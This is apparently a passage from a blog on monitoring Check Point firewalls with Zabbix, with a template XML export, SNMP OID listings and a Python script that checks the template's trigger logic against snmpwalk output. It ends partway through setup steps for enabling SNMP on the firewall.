                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>HOST-RESOURCES-MIB::hrStorageDescr.{#SNMPINDEX}</snmp_oid>
                            <key>hrStorageDescr[{#SNMPVALUE}]</key>
                            <delay>3600</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>1</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>A description of the type and instance of the storage described by this entry.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Disk partitions</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Total disk space on $1</name>
                            <type>15</type>
                            <snmp_community/>
                            <multiplier>0</multiplier>
                            <snmp_oid/>
                            <key>hrStorageSizeInBytes[{#SNMPVALUE}]</key>
                            <delay>3600</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>B</units>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params>last(&quot;hrStorageSize[{#SNMPVALUE}]&quot;) * last(&quot;hrStorageAllocationUnits[{#SNMPVALUE}]&quot;)</params>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>This is a calculated item, we need it to get total disk space in bytes.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Disk partitions</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Total disk space on $1 in units</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>HOST-RESOURCES-MIB::hrStorageSize.{#SNMPINDEX}</snmp_oid>
                            <key>hrStorageSize[{#SNMPVALUE}]</key>
                            <delay>3600</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>units</units>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The size of the storage represented by this entry, in units of hrStorageAllocationUnits. This object is writable to allow remote configuration of the size of the storage area in those cases where such an operation makes sense and is possible on the underlying system. For example, the amount of main memory allocated to a buffer pool might be modified or the amount of disk space allocated to virtual memory might be modified.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Disk partitions</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Used disk space on $1</name>
                            <type>15</type>
                            <snmp_community/>
                            <multiplier>0</multiplier>
                            <snmp_oid/>
                            <key>hrStorageUsedInBytes[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>B</units>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params>last(&quot;hrStorageUsed[{#SNMPVALUE}]&quot;) * last(&quot;hrStorageAllocationUnits[{#SNMPVALUE}]&quot;)</params>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>This is a calculated item, we need it to get used disk space in bytes.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Disk partitions</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Used disk space on $1 in units</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>HOST-RESOURCES-MIB::hrStorageUsed.{#SNMPINDEX}</snmp_oid>
                            <key>hrStorageUsed[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>units</units>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The amount of the storage represented by this entry that is allocated, in units of hrStorageAllocationUnits.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Disk partitions</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                    </item_prototypes>
                    <trigger_prototypes>
                        <trigger_prototype>
                            <expression>{Template CheckPoint SNMP:hrStorageUsed[{#SNMPVALUE}].last(0)} / {Template CheckPoint SNMP:hrStorageSize[{#SNMPVALUE}].last(0)} &gt; 0.8</expression>
                            <name>Free disk space is less than 20% on volume {#SNMPVALUE}</name>
                            <url/>
                            <status>0</status>
                            <priority>2</priority>
                            <description/>
                            <type>0</type>
                        </trigger_prototype>
                    </trigger_prototypes>
                    <graph_prototypes>
                        <graph_prototype>
                            <name>Disk space usage {#SNMPVALUE}</name>
                            <width>600</width>
                            <height>340</height>
                            <yaxismin>0.0000</yaxismin>
                            <yaxismax>0.0000</yaxismax>
                            <show_work_period>0</show_work_period>
                            <show_triggers>0</show_triggers>
                            <type>2</type>
                            <show_legend>1</show_legend>
                            <show_3d>1</show_3d>
                            <percent_left>0.0000</percent_left>
                            <percent_right>0.0000</percent_right>
                            <ymin_type_1>0</ymin_type_1>
                            <ymax_type_1>0</ymax_type_1>
                            <ymin_item_1>0</ymin_item_1>
                            <ymax_item_1>0</ymax_item_1>
                            <graph_items>
                                <graph_item>
                                    <sortorder>0</sortorder>
                                    <drawtype>0</drawtype>
                                    <color>00C800</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>2</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>hrStorageSizeInBytes[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                                <graph_item>
                                    <sortorder>1</sortorder>
                                    <drawtype>0</drawtype>
                                    <color>C80000</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>0</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>hrStorageUsedInBytes[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                            </graph_items>
                        </graph_prototype>
                    </graph_prototypes>
                </discovery_rule>
            </discovery_rules>
            <macros/>
            <templates/>
            <screens>
                <screen>
                    <name>Check Point Screen</name>
                    <hsize>2</hsize>
                    <vsize>3</vsize>
                    <screen_items>
                        <screen_item>
                            <resourcetype>0</resourcetype>
                            <width>500</width>
                            <height>100</height>
                            <x>0</x>
                            <y>0</y>
                            <colspan>1</colspan>
                            <rowspan>1</rowspan>
                            <elements>0</elements>
                            <valign>0</valign>
                            <halign>0</halign>
                            <style>0</style>
                            <url/>
                            <dynamic>0</dynamic>
                            <sort_triggers>0</sort_triggers>
                            <resource>
                                <name>Processor usage</name>
                                <host>Template CheckPoint SNMP</host>
                            </resource>
                        </screen_item>
                        <screen_item>
                            <resourcetype>0</resourcetype>
                            <width>500</width>
                            <height>100</height>
                            <x>1</x>
                            <y>0</y>
                            <colspan>1</colspan>
                            <rowspan>1</rowspan>
                            <elements>0</elements>
                            <valign>0</valign>
                            <halign>0</halign>
                            <style>0</style>
                            <url/>
                            <dynamic>0</dynamic>
                            <sort_triggers>0</sort_triggers>
                            <resource>
                                <name>Connections</name>
                                <host>Template CheckPoint SNMP</host>
                            </resource>
                        </screen_item>
                        <screen_item>
                            <resourcetype>0</resourcetype>
                            <width>500</width>
                            <height>100</height>
                            <x>1</x>
                            <y>1</y>
                            <colspan>1</colspan>
                            <rowspan>1</rowspan>
                            <elements>0</elements>
                            <valign>0</valign>
                            <halign>0</halign>
                            <style>0</style>
                            <url/>
                            <dynamic>0</dynamic>
                            <sort_triggers>0</sort_triggers>
                            <resource>
                                <name>Response time</name>
                                <host>Template CheckPoint SNMP</host>
                            </resource>
                        </screen_item>
                        <screen_item>
                            <resourcetype>0</resourcetype>
                            <width>500</width>
                            <height>100</height>
                            <x>0</x>
                            <y>2</y>
                            <colspan>1</colspan>
                            <rowspan>1</rowspan>
                            <elements>0</elements>
                            <valign>0</valign>
                            <halign>0</halign>
                            <style>0</style>
                            <url/>
                            <dynamic>0</dynamic>
                            <sort_triggers>0</sort_triggers>
                            <resource>
                                <name>Memory usage</name>
                                <host>Template CheckPoint SNMP</host>
                            </resource>
                        </screen_item>
                    </screen_items>
                </screen>
            </screens>
        </template>
    </templates>
    <triggers>
        <trigger>
            <expression>{Template CheckPoint SNMP:icmppingsec.last(0)}&gt;1</expression>
            <name>ICMP ping response too slow from {HOST.NAME}</name>
            <url/>
            <status>0</status>
            <priority>2</priority>
            <description>Host responds to ICMP ping but too slowly. CPU load on the host or network traffic might be causing this.</description>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) &gt; 50 &amp; ({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) &lt; 70</expression>
            <name>Processor usage above 50%</name>
            <url/>
            <status>0</status>
            <priority>1</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) &gt; 70 &amp; ({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) &lt; 90</expression>
            <name>Processor usage above 70%</name>
            <url/>
            <status>0</status>
            <priority>2</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) &gt; 90 &amp; ({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) &lt; 100</expression>
            <name>Processor usage above 90%</name>
            <url/>
            <status>0</status>
            <priority>3</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) = 100</expression>
            <name>Processor usage on 100%</name>
            <url/>
            <status>0</status>
            <priority>4</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>{Template CheckPoint SNMP:net.tcp.service[ssh].last(0)}=0</expression>
            <name>SSH service is down on {HOST.NAME}</name>
            <url/>
            <status>0</status>
            <priority>3</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>{Template CheckPoint SNMP:haWorkMode.diff(0)}=1 | {Template CheckPoint SNMP:haState.diff(0)}=1</expression>
            <name>{HOSTNAME} HA State Change</name>
            <url/>
            <status>0</status>
            <priority>2</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>{Template CheckPoint SNMP:haState.str(active)}=0 &amp; {Template CheckPoint SNMP:haState.str(standby)}=0</expression>
            <name>{HOSTNAME} HA State not Active/Standby</name>
            <url/>
            <status>0</status>
            <priority>3</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>{Template CheckPoint SNMP:fwInstallTime.diff(0)}=1</expression>
            <name>{HOSTNAME} Policy installed</name>
            <url/>
            <status>0</status>
            <priority>1</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
    </triggers>
    <graphs>
        <graph>
            <name>Connections</name>
            <width>900</width>
            <height>200</height>
            <yaxismin>0.0000</yaxismin>
            <yaxismax>100.0000</yaxismax>
            <show_work_period>1</show_work_period>
            <show_triggers>1</show_triggers>
            <type>0</type>
            <show_legend>1</show_legend>
            <show_3d>0</show_3d>
            <percent_left>0.0000</percent_left>
            <percent_right>0.0000</percent_right>
            <ymin_type_1>0</ymin_type_1>
            <ymax_type_1>0</ymax_type_1>
            <ymin_item_1>0</ymin_item_1>
            <ymax_item_1>0</ymax_item_1>
            <graph_items>
                <graph_item>
                    <sortorder>0</sortorder>
                    <drawtype>0</drawtype>
                    <color>00C800</color>
                    <yaxisside>0</yaxisside>
                    <calc_fnc>2</calc_fnc>
                    <type>0</type>
                    <item>
                        <host>Template CheckPoint SNMP</host>
                        <key>fwNumConn</key>
                    </item>
                </graph_item>
            </graph_items>
        </graph>
        <graph>
            <name>Memory usage</name>
            <width>900</width>
            <height>200</height>
            <yaxismin>0.0000</yaxismin>
            <yaxismax>100.0000</yaxismax>
            <show_work_period>1</show_work_period>
            <show_triggers>1</show_triggers>
            <type>0</type>
            <show_legend>1</show_legend>
            <show_3d>0</show_3d>
            <percent_left>0.0000</percent_left>
            <percent_right>0.0000</percent_right>
            <ymin_type_1>0</ymin_type_1>
            <ymax_type_1>0</ymax_type_1>
            <ymin_item_1>0</ymin_item_1>
            <ymax_item_1>
                <host>Template CheckPoint SNMP</host>
                <key>memTotalVirtual64</key>
            </ymax_item_1>
            <graph_items>
                <graph_item>
                    <sortorder>1</sortorder>
                    <drawtype>1</drawtype>
                    <color>C80000</color>
                    <yaxisside>0</yaxisside>
                    <calc_fnc>2</calc_fnc>
                    <type>0</type>
                    <item>
                        <host>Template CheckPoint SNMP</host>
                        <key>memActiveReal64</key>
                    </item>
                </graph_item>
                <graph_item>
                    <sortorder>0</sortorder>
                    <drawtype>1</drawtype>
                    <color>00C800</color>
                    <yaxisside>0</yaxisside>
                    <calc_fnc>2</calc_fnc>
                    <type>0</type>
                    <item>
                        <host>Template CheckPoint SNMP</host>
                        <key>memActiveVirtual64</key>
                    </item>
                </graph_item>
            </graph_items>
        </graph>
        <graph>
            <name>Processor usage</name>
            <width>900</width>
            <height>200</height>
            <yaxismin>0.0000</yaxismin>
            <yaxismax>100.0000</yaxismax>
            <show_work_period>1</show_work_period>
            <show_triggers>1</show_triggers>
            <type>1</type>
            <show_legend>1</show_legend>
            <show_3d>0</show_3d>
            <percent_left>0.0000</percent_left>
            <percent_right>0.0000</percent_right>
            <ymin_type_1>0</ymin_type_1>
            <ymax_type_1>0</ymax_type_1>
            <ymin_item_1>0</ymin_item_1>
            <ymax_item_1>0</ymax_item_1>
            <graph_items>
                <graph_item>
                    <sortorder>1</sortorder>
                    <drawtype>0</drawtype>
                    <color>C80000</color>
                    <yaxisside>0</yaxisside>
                    <calc_fnc>2</calc_fnc>
                    <type>0</type>
                    <item>
                        <host>Template CheckPoint SNMP</host>
                        <key>procSysTime</key>
                    </item>
                </graph_item>
                <graph_item>
                    <sortorder>0</sortorder>
                    <drawtype>0</drawtype>
                    <color>00C800</color>
                    <yaxisside>0</yaxisside>
                    <calc_fnc>2</calc_fnc>
                    <type>0</type>
                    <item>
                        <host>Template CheckPoint SNMP</host>
                        <key>procUsrTime</key>
                    </item>
                </graph_item>
            </graph_items>
        </graph>
        <graph>
            <name>Response time</name>
            <width>900</width>
            <height>200</height>
            <yaxismin>0.0000</yaxismin>
            <yaxismax>100.0000</yaxismax>
            <show_work_period>1</show_work_period>
            <show_triggers>1</show_triggers>
            <type>0</type>
            <show_legend>1</show_legend>
            <show_3d>0</show_3d>
            <percent_left>0.0000</percent_left>
            <percent_right>0.0000</percent_right>
            <ymin_type_1>0</ymin_type_1>
            <ymax_type_1>0</ymax_type_1>
            <ymin_item_1>0</ymin_item_1>
            <ymax_item_1>0</ymax_item_1>
            <graph_items>
                <graph_item>
                    <sortorder>0</sortorder>
                    <drawtype>0</drawtype>
                    <color>C80000</color>
                    <yaxisside>0</yaxisside>
                    <calc_fnc>2</calc_fnc>
                    <type>0</type>
                    <item>
                        <host>Template CheckPoint SNMP</host>
                        <key>icmppingsec</key>
                    </item>
                </graph_item>
            </graph_items>
        </graph>
    </graphs>
</zabbix_export>

Below I detail the most interesting OIDs. Not all of them are collected by the template, but if a special need comes up you can easily look up the main items below and extend the downloadable template as required.

# UC Davis MIB - UCD-SNMP-MIB
# The commented-out entries only show the path used, to make it easier
# if you are looking for some other nearby item
# ucdavis		1.3.6.1.4.1.2021
# memory		1.3.6.1.4.1.2021.4
# dskTable	    1.3.6.1.4.1.2021.9
# systemStats	1.3.6.1.4.1.2021.11

# CPU [%] - UCD-SNMP-MIB
ssCpuUser		1.3.6.1.4.1.2021.11.9		! Processor user time
ssCpuSystem		1.3.6.1.4.1.2021.11.10		! Processor system time
ssCpuIdle		1.3.6.1.4.1.2021.11.11		! Processor idle time

# Memory [kbytes] - UCD-SNMP-MIB
memTotalSwap	1.3.6.1.4.1.2021.4.3		! Total swap space
memAvailSwap	1.3.6.1.4.1.2021.4.4		! Free swap space
memTotalReal	1.3.6.1.4.1.2021.4.5		! Total real memory
memAvailReal	1.3.6.1.4.1.2021.4.6		! Available real memory

# Interfaces - IF-MIB
# For the interfaces we use the template that already ships with Zabbix,
# since low-level discovery is needed because the number of interfaces varies
ifIndex				1.3.6.1.2.1.2.2.1.1
ifDescr				1.3.6.1.2.1.2.2.1.2
ifType				1.3.6.1.2.1.2.2.1.3
ifMtu				1.3.6.1.2.1.2.2.1.4
ifSpeed				1.3.6.1.2.1.2.2.1.5
ifPhysAddress		1.3.6.1.2.1.2.2.1.6
ifAdminStatus		1.3.6.1.2.1.2.2.1.7
ifOperStatus		1.3.6.1.2.1.2.2.1.8
ifLastChange		1.3.6.1.2.1.2.2.1.9
ifInOctets			1.3.6.1.2.1.2.2.1.10
ifInUcastPkts		1.3.6.1.2.1.2.2.1.11
ifInNUcastPkts		1.3.6.1.2.1.2.2.1.12
ifInDiscards		1.3.6.1.2.1.2.2.1.13
ifInErrors			1.3.6.1.2.1.2.2.1.14
ifInUnknownProtos	1.3.6.1.2.1.2.2.1.15
ifOutOctets			1.3.6.1.2.1.2.2.1.16
ifOutDiscards		1.3.6.1.2.1.2.2.1.19
ifOutErrors			1.3.6.1.2.1.2.2.1.20

# Disk - UCD-SNMP-MIB
dskIndex	    1.3.6.1.4.1.2021.9.1.1
dskPath	        1.3.6.1.4.1.2021.9.1.2
dskDevice	    1.3.6.1.4.1.2021.9.1.3
dskMinimum	    1.3.6.1.4.1.2021.9.1.4
dskMinPercent	1.3.6.1.4.1.2021.9.1.5
dskTotal	    1.3.6.1.4.1.2021.9.1.6
dskAvail	    1.3.6.1.4.1.2021.9.1.7
dskUsed	        1.3.6.1.4.1.2021.9.1.8
dskPercent	    1.3.6.1.4.1.2021.9.1.9
dskPercentNode	1.3.6.1.4.1.2021.9.1.10
dskErrorFlag	1.3.6.1.4.1.2021.9.1.100
dskErrorMsg	    1.3.6.1.4.1.2021.9.1.101

# HOST-RESOURCES-MIB
# Don't use sysUpTimeInstance (1.3.6.1.2.1.1.3.0): that is the uptime of the
# SNMP daemon, not necessarily of the hardware
# Uptime [timeticks, 0.01s]
hrSystemUptime	1.3.6.1.2.1.25.1.1

Some metrics, such as CPU, can also be collected directly from the Check Point MIB. That MIB also has metrics of its own, such as the number of established connections.

# Check Point MIB
# checkpoint	    1.3.6.1.4.1.2620
# products 		    1.3.6.1.4.1.2620.1
# fw			    1.3.6.1.4.1.2620.1.1
# fwPolicyStat	    1.3.6.1.4.1.2620.1.1.25
# fwIfTable		    1.3.6.1.4.1.2620.1.1.25.5		! Interfaces
# fwIfEntry		    1.3.6.1.4.1.2620.1.1.25.5.1		! Interfaces
# svn			    1.3.6.1.4.1.2620.1.6
# svnPerf		    1.3.6.1.4.1.2620.1.6.7
# svnProc		    1.3.6.1.4.1.2620.1.6.7.2		! CPU
# svnMem64		    1.3.6.1.4.1.2620.1.6.7.4		! Memory

# CPU [%]
procUsrTime		    1.3.6.1.4.1.2620.1.6.7.2.1		! Processor user time
procSysTime		    1.3.6.1.4.1.2620.1.6.7.2.2		! Processor system time
procIdleTime		1.3.6.1.4.1.2620.1.6.7.2.3		! Processor idle time
procUsage		    1.3.6.1.4.1.2620.1.6.7.2.4		! Processor usage

# Memory [bytes]
memTotalVirtual64	1.3.6.1.4.1.2620.1.6.7.4.1		! Total memory (real + swap)
memActiveVirtual64	1.3.6.1.4.1.2620.1.6.7.4.2		! Active total memory
memTotalReal64		1.3.6.1.4.1.2620.1.6.7.4.3		! Total real memory
memActiveReal64		1.3.6.1.4.1.2620.1.6.7.4.4		! Active real memory
memFreeReal64		1.3.6.1.4.1.2620.1.6.7.4.5		! Available real memory

# Interfaces
fwIfIndex	        1.3.6.1.4.1.2620.1.1.25.5.1.1
fwIfName	        1.3.6.1.4.1.2620.1.1.25.5.1.2
fwAcceptPcktsIn	    1.3.6.1.4.1.2620.1.1.25.5.1.5
fwAcceptPcktsOut	1.3.6.1.4.1.2620.1.1.25.5.1.6
fwAcceptBytesIn	    1.3.6.1.4.1.2620.1.1.25.5.1.7
fwAcceptBytesOut	1.3.6.1.4.1.2620.1.1.25.5.1.8
fwDropPcktsIn	    1.3.6.1.4.1.2620.1.1.25.5.1.9
fwDropPcktsOut	    1.3.6.1.4.1.2620.1.1.25.5.1.10
fwRejectPcktsIn	    1.3.6.1.4.1.2620.1.1.25.5.1.11
fwRejectPcktsOut    1.3.6.1.4.1.2620.1.1.25.5.1.12
fwLogIn	            1.3.6.1.4.1.2620.1.1.25.5.1.13
fwLogOut	        1.3.6.1.4.1.2620.1.1.25.5.1.14

# Connections
fwNumConn		    1.3.6.1.4.1.2620.1.1.25.3		! Current connections
fwPeakNumConn	    1.3.6.1.4.1.2620.1.1.25.4		! Peak number of connections

# VPN
# The value of OID cpvCurrEspSAsIn can be checked against
# the output of "fw tab -t userc_users -s"
cpvCurrEspSAsIn	    1.3.6.1.4.1.2620.1.2.5.2.1      ! Remote Access User Count

# High Availability
haState				1.3.6.1.4.1.2620.1.5.6			! High Availability State
haWorkMode			1.3.6.1.4.1.2620.1.5.11			! High Availability Mode

# Check Point General Stats
svnVersion			1.3.6.1.4.1.2620.1.6.4.1		! Product Version
fwModuleState		1.3.6.1.4.1.2620.1.1.1			! Firewall Module State
fwProduct			1.3.6.1.4.1.2620.1.1.10			! Product name
fwInstallTime		1.3.6.1.4.1.2620.1.1.25.2		! Firewall Policy Install Time
osName				1.3.6.1.4.1.2620.1.6.5.1		! OS name

After settling on the most important OIDs to collect, I built a template for Check Point (running the Secure Platform OS). I reused pieces of the SNMP templates that ship with Zabbix, but they are embedded in this template, so it is fully self-contained (it does not link to other templates).
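To see what the template's calculated item and triggers actually compute, here is an added example (my code, not part of the original post or of the template) that parses snmpwalk-style output for the OIDs listed above and evaluates the same conditions offline: hrStorageUsedInBytes = hrStorageUsed × hrStorageAllocationUnits, the 80% disk trigger, the memory ratio from the Check Point 64-bit counters, and the CPU bands on procUsrTime + procSysTime. One caveat worth knowing: Zabbix 2.0 trigger syntax has no >= operator, so the template's CPU bands (> 50 & < 70, > 70 & < 90, > 90 & < 100) have holes at exactly 50, 70 and 90, where no trigger fires; the example uses closed bands instead. The walk output below is constructed for the example, shaped like `snmpwalk -On` output, and is not a real capture.

```python
import re
from typing import Dict, List, Tuple

# OIDs from the listing above (instance .0 for the scalars)
PROC_USR = "1.3.6.1.4.1.2620.1.6.7.2.1.0"
PROC_SYS = "1.3.6.1.4.1.2620.1.6.7.2.2.0"
FW_NUM_CONN = "1.3.6.1.4.1.2620.1.1.25.3.0"
MEM_TOTAL_V64 = "1.3.6.1.4.1.2620.1.6.7.4.1.0"
MEM_ACTIVE_V64 = "1.3.6.1.4.1.2620.1.6.7.4.2.0"
# HOST-RESOURCES-MIB hrStorageEntry columns: .3 descr, .4 allocationUnits, .5 size, .6 used
HR_STORAGE = "1.3.6.1.2.1.25.2.3.1."

# Constructed sample (not from a real gateway), one line per OID as `snmpwalk -On` prints it.
SAMPLE_WALK = """\
.1.3.6.1.4.1.2620.1.6.7.2.1.0 = INTEGER: 35
.1.3.6.1.4.1.2620.1.6.7.2.2.0 = INTEGER: 20
.1.3.6.1.4.1.2620.1.6.7.2.3.0 = INTEGER: 45
.1.3.6.1.4.1.2620.1.1.25.3.0 = INTEGER: 48231
.1.3.6.1.4.1.2620.1.6.7.4.1.0 = Counter64: 8589934592
.1.3.6.1.4.1.2620.1.6.7.4.2.0 = Counter64: 4294967296
.1.3.6.1.2.1.25.2.3.1.3.1 = STRING: "/"
.1.3.6.1.2.1.25.2.3.1.4.1 = INTEGER: 4096
.1.3.6.1.2.1.25.2.3.1.5.1 = INTEGER: 5120000
.1.3.6.1.2.1.25.2.3.1.6.1 = INTEGER: 4300000
.1.3.6.1.2.1.25.2.3.1.3.2 = STRING: "/var/log"
.1.3.6.1.2.1.25.2.3.1.4.2 = INTEGER: 4096
.1.3.6.1.2.1.25.2.3.1.5.2 = INTEGER: 2560000
.1.3.6.1.2.1.25.2.3.1.6.2 = INTEGER: 1000000
"""

LINE = re.compile(r"^\.?(?P<oid>[\d.]+)\s+=\s+(?P<type>[\w-]+):\s*(?P<val>.*)$")


def parse_snmpwalk(text: str) -> Dict[str, str]:
    """Map numeric OID -> value string; STRING values lose their quotes."""
    out: Dict[str, str] = {}
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        val = m.group("val").strip()
        if m.group("type") == "STRING":
            val = val.strip('"')
        out[m.group("oid")] = val
    return out


def cpu_level(usr: int, sys: int) -> int:
    """Severity like the template's four CPU triggers, but with closed bands (no holes at 50/70/90)."""
    total = usr + sys
    if total >= 100:
        return 4   # disaster: "Processor usage on 100%"
    if total >= 90:
        return 3
    if total >= 70:
        return 2
    if total > 50:
        return 1
    return 0


def disk_report(data: Dict[str, str], threshold: float = 0.8) -> List[Tuple[str, int, float, bool]]:
    """Per hrStorage row: (descr, used bytes as the calculated item computes them, used ratio, trigger fired)."""
    rows = []
    descr_prefix = HR_STORAGE + "3."
    for oid, descr in data.items():
        if not oid.startswith(descr_prefix):
            continue
        idx = oid[len(descr_prefix):]
        units = int(data[HR_STORAGE + "4." + idx])   # hrStorageAllocationUnits
        size = int(data[HR_STORAGE + "5." + idx])    # hrStorageSize
        used = int(data[HR_STORAGE + "6." + idx])    # hrStorageUsed
        ratio = used / size if size else 0.0
        rows.append((descr, used * units, ratio, ratio > threshold))
    return rows


def summarize(data: Dict[str, str]) -> dict:
    usr, sys = int(data[PROC_USR]), int(data[PROC_SYS])
    total_v, active_v = int(data[MEM_TOTAL_V64]), int(data[MEM_ACTIVE_V64])
    return {
        "cpu_total": usr + sys,
        "cpu_level": cpu_level(usr, sys),
        "connections": int(data[FW_NUM_CONN]),
        "mem_pct": 100.0 * active_v / total_v,
        "disks": disk_report(data),
    }


if __name__ == "__main__":
    for key, value in summarize(parse_snmpwalk(SAMPLE_WALK)).items():
        print(key, value)
```

Feed it the real output of `snmpwalk -On -v 2c -c COMMUNITY FIREWALL_IP 1.3.6.1.4.1.2620 1.3.6.1.2.1.25.2.3` to check a gateway's numbers before trusting the graphs, and to see whether a reading sits in one of the trigger holes.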

References
UCD-SNMP-MIB
IF-MIB
HOST-RESOURCES-MIB
CHECKPOINT-MIB
Check Point Products SNMP MIB
SecurePlatform OS SNMP MIB
SNMP OID for the number Remote Access users (SR/SC/EPC/SNX) currently connected to a VPN-1 gateway
Linux OID’s for CPU,Memory and Disk Statistics
Zabbix 2 CheckPoint SNMP template
Monitoring Checkpoint Firewalls with SNMP
Check Point Firewall Metrics
Oracle® Enterprise Manager System Monitoring Plug-in Metric Reference Manual for Network Management
In search of Firewalls KPIs

26/02/2013

Monitoring Check Point with Zabbix – Part 1

Filed under: checkpoint,monitoring — drak @ 10:14 AM

Although it looks trivial, monitoring a Check Point firewall has some interesting particularities. It is also worth noting that customising a monitoring tool (Zabbix, in this case) is not always as intuitive as it seems at first sight.

This article aims to guide the community and give some recommendations on how to monitor a Check Point firewall environment properly. Installing Zabbix is out of scope; the focus is configuring SNMP on the Check Point side and configuring data collection and graphs in an already installed Zabbix. Remember, though, to enable SNMP when installing/compiling Zabbix.

I will split the article in two parts: in this first part we enable SNMP, and in the second we configure collection in Zabbix.

# First, configure the SNMP parameters of the operating system (SPLAT)
# Check whether the service is already running
ps aux | grep snmp
netstat -an | egrep ":161|:260"
# If necessary, disable it before making changes
snmp service disable
# Edit the configuration file with your own community
# Important: remove the default "public" community
vi  /etc/snmp/snmpd.users.conf
rocommunity D3adpack3tsR3AD
# Sometimes the line below is needed so that requests for the Check Point OIDs
